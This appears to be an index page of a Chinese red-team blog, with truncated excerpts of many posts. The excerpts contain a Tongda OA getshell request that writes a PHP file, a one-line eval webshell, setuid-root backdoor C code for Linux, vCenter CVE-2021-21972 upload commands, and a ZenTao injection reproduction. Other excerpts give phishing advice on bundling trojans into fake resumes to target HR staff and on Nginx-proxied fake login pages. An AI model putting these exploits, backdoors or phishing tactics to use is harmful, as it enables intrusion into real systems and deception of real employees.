漏洞利用-通达OA11.10前台getshell执行命令
通达OA11.10前台getshell执行命令环境搭建:
https://www.tongda2000.com/download/p2019.php
默认安装位置在 D:\MYOA
搭建完成
直接写入文件,这里我虚拟机安装环境换成了C盘,实际按默认位置D:\MYOA打即可,这里也是写入了test内容
1/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22D:\MYOA\webroot\general\test.php%22,%22w%22),%22test%22))%3b/*&id=19&module=Carouselimage
尝试写入一句话,poc无法直接写入带有变量的php语句,在创建的过程中会吃掉变量
解决方法:
第一步先上传无参webshell
1<?php @eval(next(getallheaders()));
12345678910GET /general/appbuilder/web/portal/gatewa ...
Java学习-如何编译适配java版本的jar包
如何编译适配java版本的jar包在日常浏览github社区的过程中,会碰到一些好用的java项目,但作者往往只提供源码或与本地jdk不适配的jar包,这时候可以自行进行编译
打开项目 build 往往会出现以下报错信息:
1java: 错误: 不支持发行版本 17
files—>settings
ctrl+alt+shift+s
project选择对应版本
新建一个maven项目
依次运行clean、compile、package、install
这样可以成果编译出来,但是运行jar包会提示没有主清单属性
这时候可以选择另一种编译方法
Artifacts ——–> JAR ——–> From module with depenencies
然后选择主类(程序入口)
重新选择 build artifact
这时候会在项目目录里生成一个out目录,jar包就在里面
成功编译,并能正常运行
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?inv ...
移动安全-安卓frida hook基础篇
frida hook环境搭建安装模块
安装frida模块和frida-tools模块
12python -m pip install fridapython -m pip install frida-tools
安装adb
https://developer.android.com/studio/releases/platform-tools
添加adb至path环境变量中,cmd窗口输入 adb 检查是否成功
模拟器配置这里用的是夜神模拟器,选择 关于平板电脑,连续点击 版本号 进入开发者模式
开发者选项开启USB调试
找到 Nox\bin\BignoxVMS\nox 目录下的 nox.vbox 文件
搜索 guestport="5555",找到所在行的hostip和hostport,就是 adb 连接需要的 ip 和 port
adb连接12adb connect 127.0.0.1:62001adb devices
但此时连接大部分会出现以下报错
原因是两者adb版本不匹配所导致
更换nox_adb.exe与adb.exe一致,重启模拟 ...
钓鱼技巧-Nginx反向代理伪造页面
nginx反向代理nginx基本用法1234nginx 启动nginx -s reload 重新载入配置文件nginx -s reopen 重启nginxnginx -s stop 停止nginx
nginx安装123456789101112131415161718mkdir nginxcd nginxwget http://downloads.sourceforge.net/project/pcre/pcre/8.37/pcre-8.37.tar.gztar -xzpvf pcre-8.37.tar.gzcd pcre-8.37./configuremake && make installpcre-config --versionyum -y install make zlib zlib-devel gcc-c++ libtool openssl openssl-develcd ..wget http://nginx.org/download/nginx-1.20.1.tar.gztar -zxvf nginx-1.20.1.tar.gz./configuremak ...
攻防演练-从钓鱼上线到内网漫游
从钓鱼上线到内网漫游钓鱼邮箱搜集在线平台搜集,推荐两个好用的平台
https://app.snov.io/
http://www.skymem.info/
社工钓鱼一般钓鱼对象选取安全意识比较薄弱的岗位,如客服、招聘HR,在互联网或招聘app上可以搜集到
这次方式是制作简历捆绑马,需要准备cs免杀马一枚和一份虚假简历,钓鱼关键是话术
聊天一上来就发个文件,任谁都有警惕性,先加上聊熟了再去发送文件,建立良好关系是第一步,这和谈恋爱是一样的,目的性不能太强
然后就是钓鱼平时先养好微信小号,定期更新朋友圈,这样才显得真实
图标提取
https://github.com/JarlPenguin/BeCyIconGrabberPortable
图标替换
https://github.com/guitarfreak/SetIcon
邮件钓鱼1、个人邮箱(126邮箱、qq邮箱)
优点:注册快捷简单,即开即用
缺点:邮件发送次数限制,敏感关键字屏蔽,极大几率邮件被退信
2、腾讯企业邮
优点:单次发送数量多,邮件不易被邮件服务器拦截
缺点:需要配置,耗费一定的时间
先看看效果
腾讯企业邮搭 ...
权限维持-Linux后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现
低权限升高权限创建一个c文件
1234567#include <stdio.h>int main(){ setuid(0); system("/bin/bash"); return 0;}
1234567#include <stdio.h>int main(int argc,char* argv[]){ setuid(0); system(argv[1]); return 0;}
在高权限用户下编译,并赋予权限
12gcc -o rt hm.cchmod +s rt
日常技巧-抓取jar包payload数据
fiddler设置Connections端口为8888
代理设置为burp监听的127.0.0.1:8080
1java -DproxySet=true -DproxyHost=localhost -DproxyPort=8888 -jar yonyouNC_unserialize_tool.jar
日常技巧-BCELCODE加解密
今天值守的过程中碰到这么一个数据包,出现这么一串东西,之前没特别关注过,百度一波发现是BCEL加密
https://github.com/Xd-tl/BCELCode
1java -jar BCELCode.jar -d 333.txt
红队技术-Vcenter实战利用方式总结
Vcenter利用方式总结指纹特征1title="+ ID_VC_Welcome +"
查看Vcenter版本1/sdk/vimServiceVersions.xml
CVE-2021-219721/ui/vropspluginui/rest/services/uploadova
访问上面的路径,如果404,则代表不存在漏洞,如果405 则代表存在漏洞
windows机器:
漏洞利用: https://github.com/horizon3ai/CVE-2021-21972
12345python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp-t (目标地址)-f (上传的文件)-p (上传后的webshell路径,默认不用改)
上传后的路径为
1https://x.x.x.x/statsreport/gsl.jsp
完整 ...
漏洞复现-禅道前台注入
漏洞编号CNVD-2022-42853
影响产品1234禅道企业版 6.5 禅道旗舰版 3.0 禅道开源版 16.5 禅道开源版 16.5.beta1
复现过程搭建禅道环境,点击start运行
访问地址,登录进行抓包
1234567891011121314151617POST /zentao/user-login.html HTTP/1.1Host: 192.168.121.133:82User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.121.133:82/zentao/user- ...